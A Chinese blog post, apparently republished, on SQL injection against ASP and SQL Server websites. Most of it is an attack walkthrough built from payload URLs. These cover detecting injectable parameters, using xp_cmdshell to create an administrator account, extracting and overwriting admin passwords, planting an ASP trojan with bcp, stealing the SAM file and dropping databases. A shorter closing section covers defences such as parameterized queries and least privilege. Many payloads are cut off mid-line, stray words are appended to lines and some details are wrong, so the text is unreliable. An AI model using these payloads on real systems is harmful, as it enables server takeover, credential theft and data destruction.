SQL注入

時間 2019-11-18

標籤 sql 注入欄目 SQL 简体版

原文原文鏈接

做者: eng308 發表於 2010-02-03 18:25 原文連接
php

SQL注入攻擊是黑客對數據庫進行攻擊的經常使用手段之一。隨着B/S模式應用開發的發展，使用這種模式編寫應用程序的程序員也愈來愈多。可是因爲程序員的水平及經驗也良莠不齊，至關大一部分程序員在編寫代碼的時候，沒有對用戶輸入數據的合法性進行判斷，使應用程序存在安全隱患。用戶能夠提交一段數據庫查詢代碼，根據程序返回的結果，得到某些他想得知的數據，這就是所謂的SQL Injection，即SQL注入。SQL注入是從正常的WWW端口訪問，並且表面看起來跟通常的Web頁面訪問沒什麼區別，因此目前市面的防火牆都不會對SQL注入發出警報，若是管理員沒查看IIS日誌的習慣，可能被入侵很長時間都不會發覺。可是，SQL注入的手法至關靈活，在注入的時候會碰到不少意外的狀況，須要構造巧妙的SQL語句，從而成功獲取想要的數據。html

　　SQL注入攻擊的整體思路程序員

　　·發現SQL注入位置；web

　　·判斷後臺數據庫類型；sql

　　·肯定XP_CMDSHELL可執行狀況shell

　　·發現WEB虛擬目錄數據庫

　　·上傳ASP木馬；編程

　　·獲得管理員權限；promise

　　SQL注入攻擊的步驟安全

　　1、SQL注入漏洞的判斷

　　通常來講，SQL注入通常存在於形如：HTTP://xxx.xxx.xxx/abc.asp?id=XX等帶有參數的ASP動態網頁中，有時一個動態網頁中可能只有一個參數，有時可能有N個參數，有時是整型參數，有時是字符串型參數，不能一律而論。總之只要是帶有參數的動態網頁且此網頁訪問了數據庫，那麼就有可能存在SQL注入。若是ASP程序員沒有安全意識，不進行必要的字符過濾，存在SQL注入的可能性就很是大。

　　爲了全面瞭解動態網頁回答的信息，首選請調整IE的配置。把IE菜單-工具-Internet選項－高級－顯示友好HTTP錯誤信息前面的勾去掉。

　　爲了把問題說明清楚，如下以HTTP://xxx.xxx.xxx/abc.asp?p=YY爲例進行分析，YY多是整型，也有多是字符串。

　　一、整型參數的判斷

　　當輸入的參數YY爲整型時，一般abc.asp中SQL語句原貌大體以下：

　　select * from 表名 where 字段=YY，因此能夠用如下步驟測試SQL注入是否存在。

　　①HTTP://xxx.xxx.xxx/abc.asp?p=YY’(附加一個單引號)，此時abc.ASP中的SQL語句變成了

　　select * from 表名 where 字段=YY’，abc.asp運行異常；

　　②HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=1, abc.asp運行正常，並且與HTTP://xxx.xxx.xxx/abc.asp?p=YY運行結果相同；

　　③HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=2, abc.asp運行異常；

　　若是以上三步全面知足，abc.asp中必定存在SQL注入漏洞。

　　二、字符串型參數的判斷

　　當輸入的參數YY爲字符串時，一般abc.asp中SQL語句原貌大體以下：

　　select * from 表名 where 字段='YY'，因此能夠用如下步驟測試SQL注入是否存在。

　　①HTTP://xxx.xxx.xxx/abc.asp?p=YY’(附加一個單引號)，此時abc.ASP中的SQL語句變成了

　　select * from 表名 where 字段=YY’，abc.asp運行異常；

　　②HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1'='1', abc.asp運行正常，並且與HTTP://xxx.xxx.xxx/abc.asp?p=YY運行結果相同；

　　③HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1'='2', abc.asp運行異常；

　　若是以上三步全面知足，abc.asp中必定存在SQL注入漏洞。

　　三、特殊狀況的處理

　　有時ASP程序員會在程序員過濾掉單引號等字符，以防止SQL注入。此時能夠用如下幾種方法試一試。

　　①大小定混合法：因爲VBS並不區分大小寫，而程序員在過濾時一般要麼所有過濾大寫字符串，要麼所有過濾小寫字符串，而大小寫混合每每會被忽視。如用SelecT代替select,SELECT等；

　　②UNICODE法：在IIS中，以UNICODE字符集實現國際化，咱們徹底能夠IE中輸入的字符串化成UNICODE字符串進行輸入。如+ =%2B，空格=%20 等；URLEncode信息參見附件一；

　　③ASCII碼法：能夠把輸入的部分或所有字符所有用ASCII碼代替，如U=chr(85),a=chr(97)等，ASCII信息參見附件二；

　　2、分析數據庫服務器類型

　　通常來講，ACCESS與SQL－SERVER是最經常使用的數據庫服務器，儘管它們都支持T－SQL標準，但還有不一樣之處，並且不一樣的數據庫有不一樣的攻擊方法，必需要區別對待。

　　一、利用數據庫服務器的系統變量進行區分

　　SQL－SERVER有user,db_name()等系統變量，利用這些系統值不只能夠判斷SQL-SERVER，並且還能夠獲得大量有用信息。如：

　　① HTTP://xxx.xxx.xxx/abc.asp?p=YY and user>0 不只能夠判斷是不是SQL-SERVER，而還能夠獲得當前鏈接到數據庫的用戶名

　　②HTTP://xxx.xxx.xxx/abc.asp?p=YY&n ... db_name()>0 不只能夠判斷是不是SQL-SERVER，而還能夠獲得當前正在使用的數據庫名；

　　二、利用系統表

　　ACCESS的系統表是msysobjects,且在WEB環境下沒有訪問權限，而SQL-SERVER的系統表是sysobjects,在WEB環境下有訪問權限。對於如下兩條語句：

　　①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)>0

　　②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from msysobjects)>0

　　若數據庫是SQL-SERVE，則第一條，abc.asp必定運行正常，第二條則異常；如果ACCESS則兩條都會異常。

　　三、 MSSQL三個關鍵系統表

　　sysdatabases系統表：Microsoft SQL Server 上的每一個數據庫在表中佔一行。最初安裝 SQL Server 時，sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 數據庫的項。該表只存儲在 master 數據庫中。這個表保存在master數據庫中，這個表中保存的是什麼信息呢？這個很是重要。他是保存了全部的庫名,以及庫的ID和一些相關信息。

　　這裏我把對於咱們有用的字段名稱和相關說明給你們列出來。name //表示庫的名字。

　　dbid //表示庫的ID，dbid從1到5是系統的。分別是：master、model、msdb、mssqlweb、tempdb 這五個庫。用select * from master.dbo.sysdatabases 就能夠查詢出全部的庫名。

　　Sysobjects：SQL-SERVER的每一個數據庫內都有此係統表，它存放該數據庫內建立的全部對象，如約束、默認值、日誌、規則、存儲過程等，每一個對象在表中佔一行。

　　syscolumns：每一個表和視圖中的每列在表中佔一行，存儲過程當中的每一個參數在表中也佔一行。該表位於每一個數據庫中。主要字段有：

　　name ，id， colid ：分別是字段名稱，表ID號，字段ID號，其中的 ID 是剛上咱們用sysobjects獲得的表的ID號。

　　用: select * from ChouYFD.dbo.syscolumns where id=123456789 獲得ChouYFD這個庫中，表的ID是123456789中的全部字段列表。

　　3、肯定XP_CMDSHELL可執行狀況

　　若當前鏈接數據的賬號具備SA權限，且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程能夠直接使用操做系統的shell)可以正確執行，則整個計算機能夠經過如下幾種方法徹底控制，之後的全部步驟均可以省

　　一、HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... er>0 abc.asp執行異常但能夠獲得當前鏈接數據庫的用戶名(若顯示dbo則表明SA)。

　　二、HTTP://xxx.xxx.xxx/abc.asp?p=YY ... me()>0 abc.asp執行異常但能夠獲得當前鏈接的數據庫名。

　　三、HTTP://xxx.xxx.xxx/abc.asp?p=YY；exec master..xp_cmdshell 「net user aaa bbb /add」-- (master是SQL-SERVER的主數據庫；名中的分號表示SQL-SERVER執行完分號前的語句名，繼續執行其後面的語句；「—」號是註解，表示其後面的全部內容僅爲註釋，系統並不執行)能夠直接增長操做系統賬戶aaa,密碼爲bbb。

　　四、HTTP://xxx.xxx.xxx/abc.asp?p=YY；exec master..xp_cmdshell 「net localgroup administrators aaa /add」-- 把剛剛增長的賬戶aaa加到administrators組中。

　　五、HTTP://xxx.xxx.xxx/abc.asp?p=YY；backuup database 數據庫名 to disk='c:\inetpub\wwwroot\save.db' 則把獲得的數據內容所有備份到WEB目錄下，再用HTTP把此文件下載(固然首選要知道WEB虛擬目錄)。

　　六、經過複製CMD建立UNICODE漏洞

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY;exe ... dbo.xp_cmdshell 「copy c:\winnt\system32\cmd.exe c:\inetpub\scripts\cmd.exe」便製造了一個UNICODE漏洞，經過此漏洞的利用方法，便完成了對整個計算機的控制(固然首選要知道WEB虛擬目錄)。

　　4、發現WEB虛擬目錄

　　只有找到WEB虛擬目錄，才能肯定放置ASP木馬的位置，進而獲得USER權限。有兩種方法比較有效。

　　一是根據經驗猜解，通常來講，WEB虛擬目錄是：c:\inetpub\wwwroot; D:\inetpub\wwwroot; E:\inetpub\wwwroot等，而可執行虛擬目錄是：c:\inetpub\scripts; D:\inetpub\scripts; E:\inetpub\scripts等。

　　二是遍歷系統的目錄結構，分析結果並發現WEB虛擬目錄；

　　先建立一個臨時表：temp

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY;create&n ... mp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

　　接下來：

　　（1）利用xp_availablemedia來得到當前全部驅動器,並存入temp表中：

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert temp ... ter.dbo.xp_availablemedia;--

　　咱們能夠經過查詢temp的內容來得到驅動器列表及相關信息

　　（2）利用xp_subdirs得到子目錄列表,並存入temp表中：

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(i ... dbo.xp_subdirs 'c:\';--

　　（3）利用xp_dirtree得到全部子目錄的目錄樹結構,並寸入temp表中：

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

　　注意：

　　一、以上每完成一項瀏覽後，應刪除TEMP中的全部內容，刪除方法是：

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY;delete from temp;--

　　二、瀏覽TEMP表的方法是：(假設TestDB是當前鏈接的數據庫名)

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top& ... nbsp;TestDB.dbo.temp )>0 獲得表TEMP中第一條記錄id字段的值，並與整數進行比較，顯然abc.asp工做異常，但在異常中卻能夠發現id字段的值。假設發現的表名是xyz，則

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 id from ... ere id not in('xyz'))>0 獲得表TEMP中第二條記錄id字段的值。

　　5、上傳ASP木馬

　　所謂ASP木馬，就是一段有特殊功能的ASP代碼，並放入WEB虛擬目錄的Scripts下，遠程客戶經過IE就可執行它，進而獲得系統的USER權限，實現對系統的初步控制。上傳ASP木馬通常有兩種比較有效的方法：

　　一、利用WEB的遠程管理功能

　　許多WEB站點，爲了維護的方便，都提供了遠程管理的功能；也有很多WEB站點，其內容是對於不一樣的用戶有不一樣的訪問權限。爲了達到對用戶權限的控制，都有一個網頁，要求用戶名與密碼，只有輸入了正確的值，才能進行下一步的操做,能夠實現對WEB的管理，如上傳、下載文件，目錄瀏覽、修改配置等。

　　所以，若獲取正確的用戶名與密碼，不只能夠上傳ASP木馬，有時甚至可以直接獲得USER權限而瀏覽系統，上一步的「發現WEB虛擬目錄」的複雜操做均可省略。

　　用戶名及密碼通常存放在一張表中，發現這張表並讀取其中內容便解決了問題。如下給出兩種有效方法。

　　A、注入法：

　　從理論上說，認證網頁中會有型如：

　　select * from admin where username='XXX' and password='YYY' 的語句，若在正式運行此句以前，沒有進行必要的字符過濾，則很容易實施SQL注入。

　　如在用戶名文本框內輸入：abc’ or 1=1-- 在密碼框內輸入：123 則SQL語句變成：

　　select * from admin where username='abc’ or 1=1 and password='123’ 無論用戶輸入任何用戶名與密碼，此語句永遠都能正確執行，用戶輕易騙過系統，獲取合法身份。

　　B、猜解法：

　　基本思路是：猜解全部數據庫名稱，猜出庫中的每張表名，分析多是存放用戶名與密碼的表名，猜出表中的每一個字段名，猜出表中的每條記錄內容。

　　猜解全部數據庫名稱

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0 由於 dbid 的值從1到5，是系統用了。因此用戶本身建的必定是從6開始的。而且咱們提交了 name>1 (name字段是一個字符型的字段和數字比較會出錯),abc.asp工做異常，可獲得第一個數據庫名，同理把DBID分別改爲7,8，9,10,11,12…就可獲得全部數據庫名。

　　如下假設獲得的數據庫名是TestDB。

　　猜解數據庫中用戶名錶的名稱

　　猜解法：此方法就是根據我的的經驗猜表名，通常來講，user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。並經過語句進行判斷

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from TestDB.dbo.表名)>0 若表名存在，則abc.asp工做正常，不然異常。如此循環，直到猜到系統賬號表的名稱。

　　讀取法：SQL-SERVER有一個存放系統核心信息的表sysobjects，有關一個庫的全部表，視圖等信息所有存放在此表中，並且此表能夠經過WEB進行訪問。

　　當xtype='U' and status>0表明是用戶創建的表，發現並分析每個用戶創建的表及名稱，即可以獲得用戶名錶的名稱，基本的實現方法是：

　　①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestD ... type='U' and status>0 )>0 獲得第一個用戶創建表的名稱，並與整數進行比較，顯然abc.asp工做異常，但在異常中卻能夠發現表的名稱。假設發現的表名是xyz，則

　　②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestDB.dbo.sysobjects& ... tatus>0 and name not in('xyz'))>0 能夠獲得第二個用戶創建的表的名稱，同理就可獲得全部用創建的表的名稱。

　　根據表的名稱，通常能夠認定那張表用戶存放用戶名及密碼，如下假設此表名爲Admin。

　　l 猜解用戶名字段及密碼字段名稱

　　admin表中必定有一個用戶名字段，也必定有一個密碼字段，只有獲得此兩個字段的名稱，纔有可能獲得此兩字段的內容。如何獲得它們的名稱呢，一樣有如下兩種方法。

　　猜解法：此方法就是根據我的的經驗猜字段名，通常來講，用戶名字段的名稱經常使用：username,name,user,account等。而密碼字段的名稱經常使用：password,pass,pwd,passwd等。並經過語句進行判斷

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(字段名) from TestDB.dbo.admin)>0 「select count(字段名) from 表名」語句獲得表的行數，因此若字段名存在，則abc.asp工做正常，不然異常。如此循環，直到猜到兩個字段的名稱。

　　讀取法：基本的實現方法是

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select ... me(object_id('admin'),1) from TestDB.dbo.sysobjects)>0 。select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects是從sysobjects獲得已知表名的第一個字段名，當與整數進行比較，顯然abc.asp工做異常，但在異常中卻能夠發現字段的名稱。把col_name(object_id('admin'),1)中的1依次換成2,3,4,5，6…就可獲得全部的字段名稱。

　　l 猜解用戶名與密碼

　　猜用戶名與密碼的內容最經常使用也是最有效的方法有：

　　ASCII碼逐字解碼法:雖然這種方法速度較慢，但確定是可行的。基本的思路是先猜出字段的長度，而後依次猜出每一位的值。猜用戶名與猜密碼的方法相同，如下以猜用戶名爲例說明其過程。

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top&n ... nbsp;from TestDB.dbo.admin)=X(X=1,2，3,4，5，… n，username爲用戶名字段的名稱，admin爲表的名稱)，若x爲某一值i且abc.asp運行正常時，則i就是第一個用戶名的長度。如：當輸入

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top ... e) from TestDB.dbo.admin)=8時abc.asp運行正常，則第一個用戶名的長度爲8

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步獲得的用戶名長度之間，當m=1，2,3，…時猜想分別猜想第1,2,3,…位的值；n的值是1~九、a~z、A~Z的ASCII值，也就是1~128之間的任意值；admin爲系統用戶賬號表的名稱)，若n爲某一值i且abc.asp運行正常時，則i對應ASCII碼就是用戶名某一位值。如：當輸入

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時abc.asp運行正常，則用戶名的第三位爲P(P的ASCII爲80)；

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時abc.asp運行正常，則用戶名的第9位爲!(!的ASCII爲80)；

　　猜到第一個用戶名及密碼後，同理，能夠猜出其餘全部用戶名與密碼。注意：有時獲得的密碼多是經MD5等方式加密後的信息，還須要用專用工具進行脫密。或者先改其密碼，使用完後再改回來，見下面說明。

　　簡單法：猜用戶名用

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 ... o.admin where username>1) , flag是admin表中的一個字段，username是用戶名字段，此時abc.asp工做異常，但能獲得Username的值。與上一樣的方法，能夠獲得第二用戶名，第三個用戶等等，直到表中的全部用戶名。

　　猜用戶密碼：HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1&nb ... B.dbo.admin where pwd>1) , flag是admin表中的一個字段，pwd是密碼字段，此時abc.asp工做異常，但能獲得pwd的值。與上一樣的方法，能夠獲得第二用戶名的密碼，第三個用戶的密碼等等，直到表中的全部用戶的密碼。密碼有時是經MD5加密的，能夠改密碼。

　　HTTP://xxx.xxx.xxx/abc.asp?p=YY;update TestDB.dbo.admin set pwd=' ... where username='www';-- ( 1的MD5值爲：AAABBBCCCDDDEEEF，即把密碼改爲1；www爲已知的用戶名)

　　用一樣的方法固然可把密碼改原來的值。

　　二、利用表內容導成文件功能

　　SQL有BCP命令，它能夠把表的內容導成文本文件並放到指定位置。利用這項功能，咱們能夠先建一張臨時表，而後在表中一行一行地輸入一個ASP木馬，而後用BCP命令導出造成ASP文件。

　　命令行格式以下：

　　bcp "select * from text..foo" queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P foobar ('S'參數爲執行查詢的服務器，'U'參數爲用戶名，'P'參數爲密碼，最終上傳了一個runcommand.asp的木馬)

　　6、獲得系統的管理員權限

　　ASP木馬只有USER權限，要想獲取對系統的徹底控制，還要有系統的管理員權限。怎麼辦？提高權限的方法有不少種：

　　上傳木馬，修改開機自動運行的.ini文件(它一重啓，便死定了)；

　　複製CMD.exe到scripts，人爲製造UNICODE漏洞；

　　下載SAM文件，破解並獲取OS的全部用戶名密碼；

　　等等，視系統的具體狀況而定，能夠採起不一樣的方法。

　　7、幾個SQL-SERVER專用手段

　　一、利用xp_regread擴展存儲過程修改註冊表

　　[xp_regread]另外一個有用的內置存儲過程是xp_regXXXX類的函數集合(Xp_regaddmultistring，Xp_regdeletekey，Xp_regdeletevalue，Xp_regenumkeys，Xp_regenumvalues，Xp_regread，Xp_regremovemultistring，Xp_regwrite)。攻擊者能夠利用這些函數修改註冊表，如讀取SAM值，容許創建空鏈接，開機自動運行程序等。如：

　　exec xp_regread HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares' 肯定什麼樣的會話鏈接在服務器可用。

　　exec xp_regenumvalues HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities' 顯示服務器上全部SNMP團體配置，有了這些信息，攻擊者或許會從新配置同一網絡中的網絡設備。

　　二、利用其餘存儲過程去改變服務器

　　xp_servicecontrol過程容許用戶啓動，中止服務。如：

　　(exec master..xp_servicecontrol 'start','schedule'

　　exec master..xp_servicecontrol 'start','server')

　　Xp_availablemedia 顯示機器上有用的驅動器

　　Xp_dirtree 容許得到一個目錄樹

　　Xp_enumdsn 列舉服務器上的ODBC數據源

　　Xp_loginconfig 獲取服務器安全信息

　　Xp_makecab 容許用戶在服務器上建立一個壓縮文件

　　Xp_ntsec_enumdomains 列舉服務器能夠進入的域

　　Xp_terminate_process 提供進程的進程ID，終止此進程

　　SQL注入攻擊的背景

　　在計算機技術高速發展的今天，愈來愈讓人們頭疼的是面臨愈來愈「變態」和複雜的威脅網站技術，他們利用Internet 執行各類惡意活動，如身份竊取、私密信息竊取、帶寬資源佔用等。它們潛入以後，還會擴散並不斷更新本身。這些活動經常利用用戶的好奇心，在用戶不知道或將來容許的狀況下潛入用戶的PC，不知不覺中，賬戶裏的資金就被轉移了，公司訊息也被傳送出去，危害十分嚴重。2006年8月16日，第一個Web威脅樣本出現，截止到2006年10月25日，已經產生了第150個變種，而且，還在不斷地演化下去。

　　網站威脅的目標定位有多個維度，是我的仍是公司，仍是某種行業，都有其考慮，甚至國家、地區、性別、種族、宗教等也成爲發動攻擊的緣由或動機。攻擊還會採用多種形態，甚至是複合形態，好比病毒、蠕蟲、特洛伊、間諜軟件、殭屍、網絡釣魚電子郵件、漏洞利用、下載程序、社會工程、rootkit、黑客，結果均可以致使用戶信息受到危害，或者致使用戶所需的服務被拒絕和劫持。從其來源說Web威脅還能夠分爲內部攻擊和外部攻擊兩類。前者主要來自信任網絡，多是用戶執行了未受權訪問或是無心中定製了惡意攻擊；後者主要是因爲網絡漏洞被利用或者用戶受到惡意程序制定者的專注攻擊。

　　SQL注入攻擊的網絡分析

　　SQL注入攻擊是很是使人討厭的安全漏洞，是全部的web開發人員，無論是什麼平臺，技術，仍是數據層，須要確信他們理解和防止的東西。不幸的是，開發人員每每不集中花點時間在這上面，以致他們的應用，更糟糕的是，他們的客戶極其容易受到攻擊。

　　Michael Sutton 最近發表了一篇很是發人深省的帖子，講述在公共網上這問題是多麼地廣泛。他用Google的Search API建了一個C#的客戶端程序，尋找那些易受SQL 注入攻擊的網站。其步驟很簡單：

　　1，尋找那些帶查詢字符串的網站(例如，查詢那些在URL裏帶有 "id=" 的URL)

　　2，給這些肯定爲動態的網站發送一個請求，改變其中的id=語句，帶一個額外的單引號，來試圖取消其中的SQL語句(例如，如 id=6' )

　　3，分析返回的回覆，在其中查找象「SQL」和「query」這樣的詞，這每每表示應用返回了詳細的錯誤消息(這自己也是很糟糕的)

　　4，檢查錯誤消息是否表示發送到SQL服務器的參數沒有被正確加碼(encoded)，若是如此，那麼表示可對該網站進行SQL注入攻擊

　　對經過Google搜尋找到的1000個網站的隨機取樣測試，他檢測到其中的11.3%有易受SQL注入攻擊的可能。這很是，很是地可怕。這意味着黑客能夠遠程利用那些應用裏的數據，獲取任何沒有hashed或加密的密碼或信用卡數據，甚至有以管理員身份登錄進這些應用的可能。這不只對開發網站的開發人員來講很糟糕，並且對使用網站的消費者或用戶來講更糟糕，由於他們給網站提供了數據，想着網站是安全的呢。

　　那麼SQL注入攻擊究竟是什麼玩意？

　　有幾種情形使得SQL注入攻擊成爲可能。最多見的緣由是，你動態地構造了SQL語句，卻沒有使用正確地加了碼(encoded)的參數。譬如，考慮這個SQL查詢的編碼，其目的是根據由查詢字符串提供的社會保險號碼(social security number)來查詢做者(Authors)：

　　Dim SSN as String

　　Dim SqlQuery as String

　　SSN = Request.QueryString("SSN")

　　SqlQuery = "SELECT au_lname, au_fname FROM authors WHERE au_id = '" + SSN + "'"

　　若是你有象上面這個片段同樣的SQL編碼，那麼你的整個數據庫和應用能夠遠程地被黑掉。怎麼會呢？在普通情形下，用戶會使用一個社會保險號碼來訪問這個網站，編碼是象這樣執行的：

　　' URL to the page containing the above code

　　http://mysite.com/listauthordetails.aspx?SSN=172-32-9999

　　' SQL Query executed against the database

　　SELECT au_lname, au_fname FROM authors WHERE au_id = '172-32-9999'

　　這是開發人員預期的作法，經過社會保險號碼來查詢數據庫中做者的信息。但由於參數值沒有被正確地加碼，黑客能夠很容易地修改查詢字符串的值，在要執行的值後面嵌入附加的SQL語句。譬如，

　　' URL to the page containing the above code

　　http://mysite.com/listauthordetails.aspx?SSN=172-32-9999';DROP DATABASE pubs --

　　' SQL Query executed against the database

　　SELECT au_lname, au_fname FROM authors WHERE au_id = '';DROP DATABASE pubs --

　　注意到沒有，能夠在SSN查詢字符串值的後面添加「 ';DROP DATABASE pubs -- 」，經過「;」字符來終止當前的SQL語句，而後添加了本身的惡意的SQL語句，而後把語句的其餘部分用「--」字符串註釋掉。由於是手工在編碼裏構造SQL語句，最後把這個字符串傳給了數據庫，數據庫會先對authors表進行查詢，而後把咱們的pubs數據庫刪除。「砰(bang)」的一聲，數據庫就沒了！

　　萬一你認爲匿名黑客刪除你的數據庫的結果很壞，但不幸的是，實際上，這在SQL注入攻擊所涉及的情形中算是比較好的。一個黑客能夠不單純摧毀數據，而是使用上面這個編碼的弱點，執行一個JOIN語句，來獲取你數據庫裏的全部數據，顯示在頁面上，容許他們獲取用戶名，密碼，信用卡號碼等等。他們也能夠添加 UPDATE/INSERT 語句改變產品的價格，添加新的管理員帳號，真的搞砸你(screw up your life)呢。想象一下，到月底檢查庫存時，發現你庫房裏的實際產品數與你的帳目系統(accounting system)彙報的數目有所不一樣。

　　如何防範SQL注入攻擊

　　SQL注入攻擊是你須要擔憂的事情，無論你用什麼web編程技術，再說全部的web框架都須要擔憂這個的。你須要遵循幾條很是基本的規則：

　　1)在構造動態SQL語句時，必定要使用類安全(type-safe)的參數加碼機制。大多數的數據API，包括ADO和ADO.NET，有這樣的支持，容許你指定所提供的參數的確切類型(譬如，字符串，整數，日期等)，能夠保證這些參數被恰當地escaped/encoded了，來避免黑客利用它們。必定要從始到終地使用這些特性。

　　例如，在ADO.NET裏對動態SQL，你能夠象下面這樣重寫上述的語句，使之安全：

　　Dim SSN as String = Request.QueryString("SSN")

　　Dim cmd As new SqlCommand("SELECT au_lname, au_fname FROM authors WHERE au_id = @au_id")

　　Dim param = new SqlParameter("au_id", SqlDbType.VarChar)

　　param.Value = SSN

　　cmd.Parameters.Add(param)

　　這將防止有人試圖偷偷注入另外的SQL表達式(由於ADO.NET知道對au_id的字符串值進行加碼)，以及避免其餘數據問題(譬如不正確地轉換數值類型等)。注意，VS 2005內置的TableAdapter/DataSet設計器自動使用這個機制，ASP.NET 2.0數據源控件也是如此。

　　一個常見的錯誤知覺(misperception)是，假如你使用了存儲過程或ORM，你就徹底不受SQL注入攻擊之害了。這是不正確的，你仍是須要肯定在給存儲過程傳遞數據時你很謹慎，或在用ORM來定製一個查詢時，你的作法是安全的。

　　2) 在部署你的應用前，始終要作安全審評(security review)。創建一個正式的安全過程(formal security process)，在每次你作更新時，對全部的編碼作審評。後面一點特別重要。不少次我據說開發隊伍在正式上線(going live)前會作很詳細的安全審評，而後在幾周或幾個月以後他們作一些很小的更新時，他們會跳過安全審評這關，推說，「就是一個小小的更新，咱們之後再作編碼審評好了」。請始終堅持作安全審評。

　　3) 千萬別把敏感性數據在數據庫裏以明文存放。我我的的意見是，密碼應該老是在單向(one-way )hashed事後再存放，我甚至不喜歡將它們在加密後存放。在默認設置下，ASP.NET 2.0 Membership API 自動爲你這麼作，還同時實現了安全的SALT 隨機化行爲(SALT randomization behavior)。若是你決定創建本身的成員數據庫，我建議你查看一下咱們在這裏發表的咱們本身的Membership provider的源碼。同時也肯定對你的數據庫裏的信用卡和其餘的私有數據進行了加密。這樣即便你的數據庫被人入侵(compromised)了的話，起碼你的客戶的私有數據不會被人利用。

　　4)確認你編寫了自動化的單元測試，來特別校驗你的數據訪問層和應用程序不受SQL注入攻擊。這麼作是很是重要的，有助於捕捉住(catch)「就是一個小小的更新，全部不會有安全問題」的情形帶來的疏忽，來提供額外的安全層以免偶然地引進壞的安全缺陷到你的應用裏去。

　　5)鎖定你的數據庫的安全，只給訪問數據庫的web應用功能所需的最低的權限。若是web應用不須要訪問某些表，那麼確認它沒有訪問這些表的權限。若是web應用只須要只讀的權限從你的account payables表來生成報表，那麼確認你禁止它對此表的 insert/update/delete 的權限。

　　6)不少新手從網上下載SQL通用防注入系統的程序，在須要防範注入的頁面頭部用來防止別人進行手動注入測試（。

　　但是若是經過SQL注入分析器就可輕鬆跳過防注入系統並自動分析其注入點。而後只須要幾分鐘，你的管理員帳號及密碼就會被分析出來。

　　7)對於注入分析器的防範，筆者經過實驗，發現了一種簡單有效的防範方法。首先咱們要知道SQL注入分析器是如何工做的。在操做過程當中，發現軟件並非衝着「admin」管理員帳號去的，而是衝着權限（如flag=1）去的。這樣一來，不管你的管理員帳號怎麼變都沒法逃過檢測。

　　第三步：既然沒法逃過檢測，那咱們就作兩個帳號，一個是普通的管理員帳號，一個是防止注入的帳號，爲何這麼說呢？筆者想，若是找一個權限最大的帳號製造假象，吸引軟件的檢測，而這個帳號裏的內容是大於千字以上的中文字符，就會迫使軟件對這個帳號進行分析的時候進入全負荷狀態甚至資源耗盡而死機。下面咱們就來修改數據庫吧。

　　1.對錶結構進行修改。將管理員的帳號字段的數據類型進行修改，文本型改爲最大字段255（其實也夠了，若是還想作得再大點，能夠選擇備註型），密碼的字段也進行相同設置。

　　2.對錶進行修改。設置管理員權限的帳號放在ID1，並輸入大量中文字符（最好大於100個字）。

　　3.把真正的管理員密碼放在ID2後的任何一個位置（如放在ID549上）。

　　因爲SQL注入攻擊針對的是應用開發過程當中的編程不嚴密，於是對於絕大多數防火牆來講，這種攻擊是「合法」的。問題的解決只有依賴於完善編程。專門針對SQL注入攻擊的工具較少，Wpoison對於用asp，php進行的開發有必定幫助...。